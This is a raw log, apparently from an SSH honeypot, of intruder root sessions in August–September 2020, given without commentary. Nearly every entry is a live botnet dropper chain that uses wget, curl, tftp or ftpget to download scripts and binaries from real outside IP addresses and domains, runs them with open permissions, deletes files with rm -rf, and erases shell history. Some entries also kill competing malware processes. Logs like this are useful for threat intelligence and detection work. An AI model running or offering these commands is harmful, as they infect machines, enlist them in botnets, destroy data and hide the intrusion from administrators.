wget http://185.206.93.87/x-8.6-.GHOUL
chmod 777 *
./x-8.6-.GHOUL roots
rm -rf *

From 194.180.224.103 9-Aug-2020 03:25:51 ssh2 root
Exec cat /etc/issue ; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://193.228.91.124/pwnInfect.sh; curl -O http://193.228.91.124/pwnInfect.sh; chmod 777 pwnInfect.sh; sh pwnInfect.sh; tftp 193.228.91.124 -c get pwnInfect.sh; chmod 777 pwnInfect.sh; sh pwnInfect.sh; tftp -r pwnInfect2.sh -g 193.228.91.124; chmod 777 pwnInfect2.sh; sh pwnInfect2.sh; ftpget -v -u anonymous -p anonymous -P 21 193.228.91.124 pwnInfect1.sh pwnInfect1.sh; sh pwnInfect1.sh; rm -rf pwnInfect.sh pwnInfect.sh pwnInfect2.sh pwnInfect1.sh; rm -rf *
cat /etc/issue
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://193.228.91.124/pwnInfect.sh
curl -O http://193.228.91.124/pwnInfect.sh
chmod 777 pwnInfect.sh
sh pwnInfect.sh
tftp 193.228.91.124 -c get pwnInfect.sh
chmod 777 pwnInfect.sh
sh pwnInfect.sh
tftp -r pwnInfect2.sh -g 193.228.91.124
chmod 777 pwnInfect2.sh
sh pwnInfect2.sh
ftpget -v -u anonymous -p anonymous -P 21 193.228.91.124 pwnInfect1.sh pwnInfect1.sh
sh pwnInfect1.sh
rm -rf pwnInfect.sh pwnInfect.sh pwnInfect2.sh pwnInfect1.sh
rm -rf *

From 45.95.168.212 9-Aug-2020 11:23:33 ssh2 root
Exec cat /etc/issue; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -q http://scan.alexr00t3d.com/z0z0z/al3x.x86; cat al3x.x86 > z1z2z5a6qw5asda; chmod +x z1z2z5a6qw5asda; ./z1z2z5a6qw5asda Rooted.VPS; history -c
cat /etc/issue
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget -q http://scan.alexr00t3d.com/z0z0z/al3x.x86
cat al3x.x86 > z1z2z5a6qw5asda
chmod +x z1z2z5a6qw5asda
./z1z2z5a6qw5asda Rooted.VPS
history -c

From 185.249.199.247 10-Aug-2020 02:25:43 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://194.87.138.23/GhOul.sh; chmod 777 GhOul.sh; sh GhOul.sh; tftp 194.87.138.23 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 194.87.138.23; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 194.87.138.23 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf GhOul.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://194.87.138.23/GhOul.sh
chmod 777 GhOul.sh
sh GhOul.sh
tftp 194.87.138.23 -c get tftp1.sh
chmod 777 tftp1.sh
sh tftp1.sh
tftp -r tftp2.sh -g 194.87.138.23
chmod 777 tftp2.sh
sh tftp2.sh
ftpget -v -u anonymous -p anonymous -P 21 194.87.138.23 ftp1.sh ftp1.sh
sh ftp1.sh
rm -rf GhOul.sh tftp1.sh tftp2.sh ftp1.sh
rm -rf *

From 2.57.122.186 10-Aug-2020 03:32:10 ssh2 root
Exec wget http://79.124.78.143/hoho/cutie.x86; curl -O http://79.124.78.143/hoho/cutie.x86; ./cutie.x86 infn.x86; echo Killing; pkill w.x86; pkill b3astmode.x86; pkill loligang.x86; pkill jKira.x86; pkill 3AvA; pkill java; pkill Scylla; echo InfectedNight4life;
wget http://79.124.78.143/hoho/cutie.x86
curl -O http://79.124.78.143/hoho/cutie.x86
./cutie.x86 infn.x86
echo Killing
pkill w.x86
pkill b3astmode.x86
pkill loligang.x86
pkill jKira.x86
pkill 3AvA
pkill java
pkill Scylla
echo InfectedNight4life

From 45.95.168.172 10-Aug-2020 05:31:01 ssh2 root
Exec cat /etc/issue; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -q http://185.172.110.185/taevimncorufglbzhwxqpdkjs/Meth.x86; cat Meth.x86 > sn0rt; chmod +x sn0rt; ./sn0rt ROOTED; history -c
cat /etc/issue
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget -q http://185.172.110.185/taevimncorufglbzhwxqpdkjs/Meth.x86
cat Meth.x86 > sn0rt
chmod +x sn0rt
./sn0rt ROOTED
history -c

From 185.132.53.11 11-Aug-2020 07:14:41 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://194.180.224.118/DARLING.sh; chmod 777 *; sh DARLING.sh; tftp -g 194.180.224.118 -r tftp1.sh; chmod 777 *; sh tftp1.sh; rm -rf *.sh; history -c
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://194.180.224.118/DARLING.sh
chmod 777 *
sh DARLING.sh
tftp -g 194.180.224.118 -r tftp1.sh
chmod 777 *
sh tftp1.sh
rm -rf *.sh
history -c

From 212.33.203.201 11-Aug-2020 07:22:41 ssh2 root
Exec cd /tmp; wget http://212.33.203.199/x-8.6-.SNOOPY; chmod 777 *; ./x-8.6-.SNOOPY roots; rm -rf *
cd /tmp
wget http://212.33.203.199/x-8.6-.SNOOPY
chmod 777 *
./x-8.6-.SNOOPY roots
rm -rf *

From 163.172.161.31 11-Aug-2020 22:43:19 ssh2 root
Exec cat /etc/issue ; wget 163.172.161.31/bot.pl ; perl bot.pl ; rm -rf bot.pl ; history -c
cat /etc/issue
wget 163.172.161.31/bot.pl
perl bot.pl
rm -rf bot.pl
history -c

From 193.228.91.109 12-Aug-2020 04:54:19 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://193.228.91.105/vsUerS.sh; curl -O http://193.228.91.105/vsUerS.sh; chmod 777 vsUerS.sh; sh vsUerS.sh; tftp 193.228.91.105 -c get tfJDs1.sh; chmod 777 tfJDs1.sh; sh tfJDs1.sh; tftp -r tftSdvkzb.sh -g 193.228.91.105; chmod 777 tftSdvkzb.sh; sh tftSdvkzb.sh; ftpget -v -u anonymous -p anonymous -P 21 193.228.91.105 ftpSedr1.sh ftpSedr1.sh; sh ftpSedr1.sh; rm -rf vsUerS.sh tfJDs1.sh tftSdvkzb.sh ftpSedr1.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://193.228.91.105/vsUerS.sh
curl -O http://193.228.91.105/vsUerS.sh
chmod 777 vsUerS.sh
sh vsUerS.sh
tftp 193.228.91.105 -c get tfJDs1.sh
chmod 777 tfJDs1.sh
sh tfJDs1.sh
tftp -r tftSdvkzb.sh -g 193.228.91.105
chmod 777 tftSdvkzb.sh
sh tftSdvkzb.sh
ftpget -v -u anonymous -p anonymous -P 21 193.228.91.105 ftpSedr1.sh ftpSedr1.sh
sh ftpSedr1.sh
rm -rf vsUerS.sh tfJDs1.sh tftSdvkzb.sh ftpSedr1.sh
rm -rf *

From 194.15.36.19 12-Aug-2020 08:27:14 ssh2 root
Exec wget http://45.95.168.201/beastmode/b3astmode.x86; chmod 777 b3astmode.x86; ./b3astmode.x86 roots; rm -rf b3astmode.*
wget http://45.95.168.201/beastmode/b3astmode.x86
chmod 777 b3astmode.x86
./b3astmode.x86 roots
rm -rf b3astmode.*

From 37.49.224.88 12-Aug-2020 11:42:54 ssh2 root
Exec cat /etc/issue; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -q http://37.49.224.87/stableisbest/savanne.x86; cat savanne.x86 > dcfsd0cvs3ds12c; chmod +x dcfsd0cvs3ds12c; ./dcfsd0cvs3ds12c Rooted.VPS; history -c
cat /etc/issue
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget -q http://37.49.224.87/stableisbest/savanne.x86
cat savanne.x86 > dcfsd0cvs3ds12c
chmod +x dcfsd0cvs3ds12c
./dcfsd0cvs3ds12c Rooted.VPS
history -c

From 167.71.77.125 12-Aug-2020 14:41:58 ssh2 root
Exec cd /tmp; wget http://185.172.111.226/bins.sh; chmod 777 *; sh bins.sh; tftp -g 185.172.111.226 -r tftp.sh; chmod 777 *; sh tftp.sh; rm -rf *.sh
cd /tmp
wget http://185.172.111.226/bins.sh
chmod 777 *
sh bins.sh
tftp -g 185.172.111.226 -r tftp.sh
chmod 777 *
sh tftp.sh
rm -rf *.sh

From 45.95.168.138 12-Aug-2020 23:25:49 ssh2 root
Exec cd /tmp || cd /var/tmp || cd /run || cd /home || cd /var || cd /etc || cd /var/run || cd /mnt || cd /root || cd /; wget http://45.95.168.138/roots.sh; curl -O http://45.95.168.138/roots.sh; chmod 777 roots.sh;sh roots.sh
cd /tmp || cd /var/tmp || cd /run || cd /home || cd /var || cd /etc || cd /var/run || cd /mnt || cd /root || cd /
wget http://45.95.168.138/roots.sh
curl -O http://45.95.168.138/roots.sh
chmod 777 roots.sh
sh roots.sh

From 37.49.230.229 13-Aug-2020 14:57:15 ssh2 root
Exec cat /etc/issue; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -q http://37.49.224.153/dirdir000/0s1s12.x86; cat 0s1s12.x86 > z1z2z5a6qw5asda; chmod +x z1z2z5a6qw5asda; ./z1z2z5a6qw5asda Rooted.VPS; history -c
cat /etc/issue
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget -q http://37.49.224.153/dirdir000/0s1s12.x86
cat 0s1s12.x86 > z1z2z5a6qw5asda
chmod +x z1z2z5a6qw5asda
./z1z2z5a6qw5asda Rooted.VPS
history -c

From 95.211.79.114 13-Aug-2020 22:10:56 ssh2 root
Exec cat /etc/issue ; wget 163.172.161.31/bot.pl ; perl bot.pl ; rm -rf bot.pl ; history -c ; curl -O 163.172.161.31/bot.pl ; perl bot.pl ; rm -rf bot.pl ; history -c ; cd /tmp || cd /run || cd /; wget http://185.252.41.232/sploitbins.sh; chmod 777 sploitbins.sh; sh sploitbins.sh; tftp 185.252.41.232 -c get sploittftp1.sh; chmod 777 sploittftp1.sh; sh sploittftp1.sh; tftp -r sploittftp2.sh -g 185.252.41.232; chmod 777 sploittftp2.sh; sh sploittftp2.sh; rm -rf sploitbins.sh sploittftp1.sh sploittftp2.sh; rm -rf *
cat /etc/issue
wget 163.172.161.31/bot.pl
perl bot.pl
rm -rf bot.pl
history -c
curl -O 163.172.161.31/bot.pl
perl bot.pl
rm -rf bot.pl
history -c
cd /tmp || cd /run || cd /
wget http://185.252.41.232/sploitbins.sh
chmod 777 sploitbins.sh
sh sploitbins.sh
tftp 185.252.41.232 -c get sploittftp1.sh
chmod 777 sploittftp1.sh
sh sploittftp1.sh
tftp -r sploittftp2.sh -g 185.252.41.232
chmod 777 sploittftp2.sh
sh sploittftp2.sh
rm -rf sploitbins.sh sploittftp1.sh sploittftp2.sh
rm -rf *

From 2.57.122.186 14-Aug-2020 03:49:32 ssh2 root
Exec cat /etc/issue; echo Killing; pkill w.x86; pkill b3astmode.x86; pkill loligang.x86; pkill jKira.x86; pkill 3AvA; pkill java; pkill Scylla; echo InfectedNight4life;
cat /etc/issue
echo Killing
pkill w.x86
pkill b3astmode.x86
pkill loligang.x86
pkill jKira.x86
pkill 3AvA
pkill java
pkill Scylla
echo InfectedNight4life

From 194.180.224.103 14-Aug-2020 14:57:06 ssh2 root
Exec cat /etc/issue ; cd /tmp || cd /run || cd /; wget http://193.228.91.123/reportandyougaybins.sh; chmod 777 reportandyougaybins.sh; sh reportandyougaybins.sh; tftp 193.228.91.123 -c get reportandyougaytftp1.sh; chmod 777 reportandyougaytftp1.sh; sh reportandyougaytftp1.sh; tftp -r reportandyougaytftp2.sh -g 193.228.91.123; chmod 777 reportandyougaytftp2.sh; sh reportandyougaytftp2.sh; rm -rf reportandyougaybins.sh reportandyougaytftp1.sh reportandyougaytftp2.sh; rm -rf *
cat /etc/issue
cd /tmp || cd /run || cd /
wget http://193.228.91.123/reportandyougaybins.sh
chmod 777 reportandyougaybins.sh
sh reportandyougaybins.sh
tftp 193.228.91.123 -c get reportandyougaytftp1.sh
chmod 777 reportandyougaytftp1.sh
sh reportandyougaytftp1.sh
tftp -r reportandyougaytftp2.sh -g 193.228.91.123
chmod 777 reportandyougaytftp2.sh
sh reportandyougaytftp2.sh
rm -rf reportandyougaybins.sh reportandyougaytftp1.sh reportandyougaytftp2.sh
rm -rf *

From 212.33.203.228 15-Aug-2020 07:52:53 ssh2 root
Exec cd /tmp; wget http://212.33.203.199/x-8.6-.GHOUL; chmod 777 *; ./x-8.6-.GHOUL roots; rm -rf *
cd /tmp
wget http://212.33.203.199/x-8.6-.GHOUL
chmod 777 *
./x-8.6-.GHOUL roots
rm -rf *

From 193.228.91.123 15-Aug-2020 08:48:38 ssh2 root
Exec wget http://ws-ebavisapia01-dll.ir/uih7U8JY7Of7Y8O9d6t68IT67R8y76t7823tg8weuq/pwnNet.x86; chmod 777 *; ./pwnNet.x86 Roots;rm -rf pwnNet.x86;rm -rf pwn*; history -c
wget http://ws-ebavisapia01-dll.ir/uih7U8JY7Of7Y8O9d6t68IT67R8y76t7823tg8weuq/pwnNet.x86
chmod 777 *
./pwnNet.x86 Roots
rm -rf pwnNet.x86
rm -rf pwn*
history -c

From 111.77.205.81 15-Aug-2020 19:07:42 ssh2 root
Exec at /etc/issue ; cd /tmp ; wget 1.232.156.19/bot.pl ; perl bot.pl ; rm -rf bot.pl ; curl -O 1.232.156.19/bot.pl ; perl bot.pl ; rm -rf bot* ; history -c
at /etc/issue
cd /tmp
wget 1.232.156.19/bot.pl
perl bot.pl
rm -rf bot.pl
curl -O 1.232.156.19/bot.pl
perl bot.pl
rm -rf bot*
history -c

From 2.57.122.186 16-Aug-2020 07:23:31 ssh2 root
Exec wget http://185.172.111.189/pedalcheta/cutie.x86; curl -O http://185.172.111.189/pedalcheta/cutie.x86; chmod 777 *; ./cutie.x86 infn.x86; pkill 3AvA; pkill Scylla; pkill b3astmode.x86; pkill java; pkill w.x86; pkill b3astmode.x86; pkill loligang.x86; pkill jKira.x86; pkill 3AvA; pkill java; pkill Scylla
wget http://185.172.111.189/pedalcheta/cutie.x86
curl -O http://185.172.111.189/pedalcheta/cutie.x86
chmod 777 *
./cutie.x86 infn.x86
pkill 3AvA
pkill Scylla
pkill b3astmode.x86
pkill java
pkill w.x86
pkill b3astmode.x86
pkill loligang.x86
pkill jKira.x86
pkill 3AvA
pkill java
pkill Scylla

From 1.232.156.19 18-Aug-2020 04:13:07 ssh2 root
Exec cat /etc/issue ; cd /tmp ; wget 1.232.156.19/bot.pl ; perl bot.pl ; rm -rf bot.pl ; curl -O 1.232.156.19/bot.pl ; perl bot.pl ; rm -rf bot* ; history -c
cat /etc/issue
cd /tmp
wget 1.232.156.19/bot.pl
perl bot.pl
rm -rf bot.pl
curl -O 1.232.156.19/bot.pl
perl bot.pl
rm -rf bot*
history -c

From 45.95.168.172 18-Aug-2020 09:02:17 ssh2 root
Exec cat /etc/issue; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -q http://185.172.110.185/0xxx0xxxasdajshdsajhkgdja/m3th.x86; cat m3th.x86 > sn0rt; chmod +x sn0rt; ./sn0rt ROOTED; history -c
cat /etc/issue
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget -q http://185.172.110.185/0xxx0xxxasdajshdsajhkgdja/m3th.x86
cat m3th.x86 > sn0rt
chmod +x sn0rt
./sn0rt ROOTED
history -c

From 159.203.90.161 18-Aug-2020 13:39:02 ssh2 root
Exec uname -a;unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH;history -n;export HISTFILE=/dev/null;killall -9 ident;killall -9 super;killall -9 atd;killall -9 [rpc];killall -9 sync_time;cd /var/tmp;cd /dev/shm;cd /tmp;rm -rf px.txt;wget -q 203.146.208.208/drago/images/.x/px.txt || curl -O -f -s 203.146.208.208/drago/images/.x/px.txt;perl px.txt;rm -rf px.txt
uname -a
unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH
history -n
export HISTFILE=/dev/null
killall -9 ident
killall -9 super
killall -9 atd
killall -9 [rpc]
killall -9 sync_time
cd /var/tmp
cd /dev/shm
cd /tmp
rm -rf px.txt
wget -q 203.146.208.208/drago/images/.x/px.txt || curl -O -f -s 203.146.208.208/drago/images/.x/px.txt
perl px.txt
rm -rf px.txt

From 188.161.105.217 19-Aug-2020 02:31:32 ssh2 root
ÙØ³
ls
free -m

From 185.63.253.51 19-Aug-2020 10:24:45 ssh2 root
Exec cd /tmp; wget http://185.63.253.157/aut/aut.x86; chmod 777 aut.x86; ./aut.x86 server; rm -rf *
cd /tmp
wget http://185.63.253.157/aut/aut.x86
chmod 777 aut.x86
./aut.x86 server
rm -rf *

From 45.95.168.190 19-Aug-2020 10:25:52 ssh2 root
Exec wget http://hydradown.xyz/beastmode/b3astmode.x86; chmod 777 b3astmode.x86; ./b3astmode.x86 roots
wget http://hydradown.xyz/beastmode/b3astmode.x86
chmod 777 b3astmode.x86
./b3astmode.x86 roots
Exec cd /tmp; wget http://149.3.170.217/HOPEIDONTHITTHEurlhausabuseLOL/zbetcheckin.x86; chmod 777 *; ./zbetcheckin.x86 servers; rm -rf *
cd /tmp
wget http://149.3.170.217/HOPEIDONTHITTHEurlhausabuseLOL/zbetcheckin.x86
chmod 777 *
./zbetcheckin.x86 servers
rm -rf *

From 107.172.141.105 19-Aug-2020 10:27:21 ssh2 root
Exec wget http://hydradown.xyz/beastmode/b3astmode.x86; chmod 777 b3astmode.x86; ./b3astmode.x86 roots
wget http://hydradown.xyz/beastmode/b3astmode.x86
chmod 777 b3astmode.x86
./b3astmode.x86 roots

From 45.95.168.190 19-Aug-2020 16:08:34 ssh2 root
Exec cd /tmp; wget http://149.3.170.217/HOPEIDONTHITTHEurlhausabuseLOL/zbetcheckin.x86; chmod 777 *; ./zbetcheckin.x86 servers; rm -rf *
cd /tmp
wget http://149.3.170.217/HOPEIDONTHITTHEurlhausabuseLOL/zbetcheckin.x86
chmod 777 *
./zbetcheckin.x86 servers
rm -rf *

From 193.228.91.123 19-Aug-2020 23:47:41 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://193.228.91.124/pwnInfect.sh; curl -O http://193.228.91.124/pwnInfect.sh; chmod 777 pwnInfect.sh; sh pwnInfect.sh; tftp 193.228.91.124 -c get pwnInfect.sh; chmod 777 pwnInfect.sh; sh pwnInfect.sh; tftp -r pwnInfect2.sh -g 193.228.91.124; chmod 777 pwnInfect2.sh; sh pwnInfect2.sh; ftpget -v -u anonymous -p anonymous -P 21 193.228.91.124 pwnInfect1.sh pwnInfect1.sh; sh pwnInfect1.sh; rm -rf pwnInfect.sh pwnInfect.sh pwnInfect2.sh pwnInfect1.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://193.228.91.124/pwnInfect.sh
curl -O http://193.228.91.124/pwnInfect.sh
chmod 777 pwnInfect.sh
sh pwnInfect.sh
tftp 193.228.91.124 -c get pwnInfect.sh
chmod 777 pwnInfect.sh
sh pwnInfect.sh
tftp -r pwnInfect2.sh -g 193.228.91.124
chmod 777 pwnInfect2.sh
sh pwnInfect2.sh
ftpget -v -u anonymous -p anonymous -P 21 193.228.91.124 pwnInfect1.sh pwnInfect1.sh
sh pwnInfect1.sh
rm -rf pwnInfect.sh pwnInfect.sh pwnInfect2.sh pwnInfect1.sh
rm -rf *

From 104.131.90.56 20-Aug-2020 13:22:59 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://107.173.213.43/Snoopy.sh; chmod 777 Snoopy.sh; sh Snoopy.sh; tftp 107.173.213.43 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 107.173.213.43; chmod 777 tftp2.sh; sh tftp2.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://107.173.213.43/Snoopy.sh
chmod 777 Snoopy.sh
sh Snoopy.sh
tftp 107.173.213.43 -c get tftp1.sh
chmod 777 tftp1.sh
sh tftp1.sh
tftp -r tftp2.sh -g 107.173.213.43
chmod 777 tftp2.sh
sh tftp2.sh
rm -rf *

From 194.15.36.104 22-Aug-2020 03:59:02 ssh2 root
Exec wget http://194.87.138.205/bins/jKira.x86; chmod 777 jKira.x86; ./jKira.x86 roots; rm -rf jKira.* ; history -c
wget http://194.87.138.205/bins/jKira.x86
chmod 777 jKira.x86
./jKira.x86 roots
rm -rf jKira.*
history -c

From 83.149.99.8 23-Aug-2020 05:31:49 ssh2 root
Exec cat /etc/issue ; wget 121.48.164.46/bot.pl ; perl bot.pl ; rm -rf bot.pl ; curl -O 121.48.164.46/bot.pl ; perl bot.pl ; rm -rf bot.pl ; history -c
cat /etc/issue
wget 121.48.164.46/bot.pl
perl bot.pl
rm -rf bot.pl
curl -O 121.48.164.46/bot.pl
perl bot.pl
rm -rf bot.pl
history -c

From 83.149.99.8 23-Aug-2020 12:20:44 ssh2 root
Exec cat /etc/issue ; wget 83.149.99.8/bot.pl ; perl bot.pl ; rm -rf bot.pl ; curl -O 83.149.99.8/bot.pl ; perl bot.pl ; rm -rf bot.pl ; history -c
cat /etc/issue
wget 83.149.99.8/bot.pl
perl bot.pl
rm -rf bot.pl
curl -O 83.149.99.8/bot.pl
perl bot.pl
rm -rf bot.pl
history -c

From 188.166.9.196 24-Aug-2020 03:08:14 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://107.175.95.101/bins.sh; chmod 777 bins.sh; sh bins.sh; tftp 107.175.95.101 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 107.175.95.101; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 107.175.95.101 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf bins.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://107.175.95.101/bins.sh
chmod 777 bins.sh
sh bins.sh
tftp 107.175.95.101 -c get tftp1.sh
chmod 777 tftp1.sh
sh tftp1.sh
tftp -r tftp2.sh -g 107.175.95.101
chmod 777 tftp2.sh
sh tftp2.sh
ftpget -v -u anonymous -p anonymous -P 21 107.175.95.101 ftp1.sh ftp1.sh
sh ftp1.sh
rm -rf bins.sh tftp1.sh tftp2.sh ftp1.sh
rm -rf *

From 193.239.147.60 24-Aug-2020 13:09:05 ssh2 root
Exec cd /tmp  cd /var/run  cd /mnt  cd /root  cd /; wget http://194.180.224.118/SnOoPy.sh; chmod 777 *; sh SnOoPy.sh; tftp -g 194.180.224.118 -r tftp1.sh; chmod 777 *; sh tftp1.sh; rm -rf *.sh; history -c
cd /tmp cd /var/run cd /mnt cd /root cd /
wget http://194.180.224.118/SnOoPy.sh
chmod 777 *
sh SnOoPy.sh
tftp -g 194.180.224.118 -r tftp1.sh
chmod 777 *
sh tftp1.sh
rm -rf *.sh
history -c

From 206.189.179.73 24-Aug-2020 23:36:45 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://107.175.95.101/skid.sh; chmod 777 skid.sh; sh skid.sh; tftp 107.175.95.101 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 107.175.95.101; chmod 777 tftp2.sh; sh tftp2.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://107.175.95.101/skid.sh
chmod 777 skid.sh
sh skid.sh
tftp 107.175.95.101 -c get tftp1.sh
chmod 777 tftp1.sh
sh tftp1.sh
tftp -r tftp2.sh -g 107.175.95.101
chmod 777 tftp2.sh
sh tftp2.sh
rm -rf *

From 45.95.168.130 25-Aug-2020 01:21:27 ssh2 root
Exec cat /etc/issue ; cat /etc/issue ; cd /tmp || cd /run || cd /; wget http://37.49.224.207/FuckBitchBastardDamnCuntJesusHaroldChristbins.sh; chmod 777 FuckBitchBastardDamnCuntJesusHaroldChristbins.sh; sh FuckBitchBastardDamnCuntJesusHaroldChristbins.sh; rm -rf *
cat /etc/issue
cat /etc/issue
cd /tmp || cd /run || cd /
wget http://37.49.224.207/FuckBitchBastardDamnCuntJesusHaroldChristbins.sh
chmod 777 FuckBitchBastardDamnCuntJesusHaroldChristbins.sh
sh FuckBitchBastardDamnCuntJesusHaroldChristbins.sh
rm -rf *

From 45.95.168.172 25-Aug-2020 04:48:03 ssh2 root
Exec cat /etc/issue; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -q http://185.172.110.175/0xxx0xxxasdajshdsajhkgdja/m3th.x86; cat m3th.x86 > sn0rt; chmod +x sn0rt; ./sn0rt ROOTED; history -c
cat /etc/issue
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget -q http://185.172.110.175/0xxx0xxxasdajshdsajhkgdja/m3th.x86
cat m3th.x86 > sn0rt
chmod +x sn0rt
./sn0rt ROOTED
history -c

From 104.248.32.4 25-Aug-2020 06:02:19 ssh2 root
Exec cat /etc/issue; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -q http://149.56.26.173/dirdir000/0s1s12.x86; cat 0s1s12.x86 > z1z2z5a6qw5asda; chmod +x z1z2z5a6qw5asda; ./z1z2z5a6qw5asda Rooted.VPS; history -c
cat /etc/issue
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget -q http://149.56.26.173/dirdir000/0s1s12.x86
cat 0s1s12.x86 > z1z2z5a6qw5asda
chmod +x z1z2z5a6qw5asda
./z1z2z5a6qw5asda Rooted.VPS
history -c

From 159.203.90.161 25-Aug-2020 15:41:07 ssh2 root
Exec uname -a;unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH;history -n;export HISTFILE=/dev/null;cd /var/tmp;cd /dev/shm;cd /tmp;wget -q 203.146.208.208/drago/images/.x/px.txt || curl -O -f -s 203.146.208.208/drago/images/.x/px.txt;perl px.txt;rm -rf px.txt
uname -a
unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH
history -n
export HISTFILE=/dev/null
cd /var/tmp
cd /dev/shm
cd /tmp
wget -q 203.146.208.208/drago/images/.x/px.txt || curl -O -f -s 203.146.208.208/drago/images/.x/px.txt
perl px.txt
rm -rf px.txt

From 176.247.194.75 26-Aug-2020 02:20:20 ssh2 root
w
wget

From 185.132.53.194 27-Aug-2020 00:54:09 ssh2 root
Exec wget http://45.95.168.201/wkomqp; chmod 777 wkomqp; ./wkomqp roots; rm -rf wkomqp* ; history -c
wget http://45.95.168.201/wkomqp
chmod 777 wkomqp
./wkomqp roots
rm -rf wkomqp*
history -c

From 91.200.102.244 27-Aug-2020 13:35:49 ssh2 root
Exec busybox wget http://107.172.197.101/pedalcheta/cutie.x86_64; wget http://107.172.197.101/pedalcheta/cutie.x86_64; curl -O http://107.172.197.101/pedalcheta/cutie.x86_64; chmod 777 cutie.x86_64; ./cutie.x86_64 MINECRAFT; rm -rf *; echo pozdravi za vessonsecurity ot ghosta i accrobata hackerite
busybox wget http://107.172.197.101/pedalcheta/cutie.x86_64
wget http://107.172.197.101/pedalcheta/cutie.x86_64
curl -O http://107.172.197.101/pedalcheta/cutie.x86_64
chmod 777 cutie.x86_64
./cutie.x86_64 MINECRAFT
rm -rf *
echo pozdravi za vessonsecurity ot ghosta i accrobata hackerite

From 185.132.53.126 29-Aug-2020 05:03:03 ssh2 root
Exec wget http://185.132.53.238/x86; chmod 777 x86; ./x86; rm -rf x86; history -c
wget http://185.132.53.238/x86
chmod 777 x86
./x86
rm -rf x86
history -c

From 148.70.68.36 29-Aug-2020 05:31:57 ssh2 root
Exec ping 8.8.8.8
ping 8.8.8.8
Exec cat /proc/cpuinfo | grep name | wc -l
cat /proc/cpuinfo | grep name | wc -l

From 212.33.199.3 30-Aug-2020 01:24:46 ssh2 root
Exec cd /tmp; wget http://172.245.104.116/HOPEIDONTHITTHEurlhausabuseLOL/zbetcheckin.x86_64; chmod 777 *; ./zbetcheckin.x86_64 mnimaan; rm -rf *
cd /tmp
wget http://172.245.104.116/HOPEIDONTHITTHEurlhausabuseLOL/zbetcheckin.x86_64
chmod 777 *
./zbetcheckin.x86_64 mnimaan
rm -rf *

From 194.180.224.130 1-Sep-2020 16:09:14 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://193.228.91.110/bot.sh; curl -O http://193.228.91.110/bot.sh; chmod 777 bot.sh; sh bot.sh; tftp 193.228.91.110 -c get tbot.sh; chmod 777 tbot.sh; sh tbot.sh; tftp -r tbot2.sh -g 193.228.91.110; chmod 777 tbot2.sh; sh tbot2.sh; ftpget -v -u anonymous -p anonymous -P 21 193.228.91.110 bot1.sh bot1.sh; sh bot1.sh; rm -rf bot.sh tbot.sh tbot2.sh bot1.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://193.228.91.110/bot.sh
curl -O http://193.228.91.110/bot.sh
chmod 777 bot.sh
sh bot.sh
tftp 193.228.91.110 -c get tbot.sh
chmod 777 tbot.sh
sh tbot.sh
tftp -r tbot2.sh -g 193.228.91.110
chmod 777 tbot2.sh
sh tbot2.sh
ftpget -v -u anonymous -p anonymous -P 21 193.228.91.110 bot1.sh bot1.sh
sh bot1.sh
rm -rf bot.sh tbot.sh tbot2.sh bot1.sh
rm -rf *

From 121.48.164.46 1-Sep-2020 16:48:56 ssh2 root
Exec cat /etc/issue ; cd /tmp ; wget 34.96.189.100/bot.pl ; perl bot.pl ; rm -rf bot.pl ; curl -O 34.96.189.100/bot.pl ; perl bot.pl ; rm -rf bot.pl ; history -c
cat /etc/issue
cd /tmp
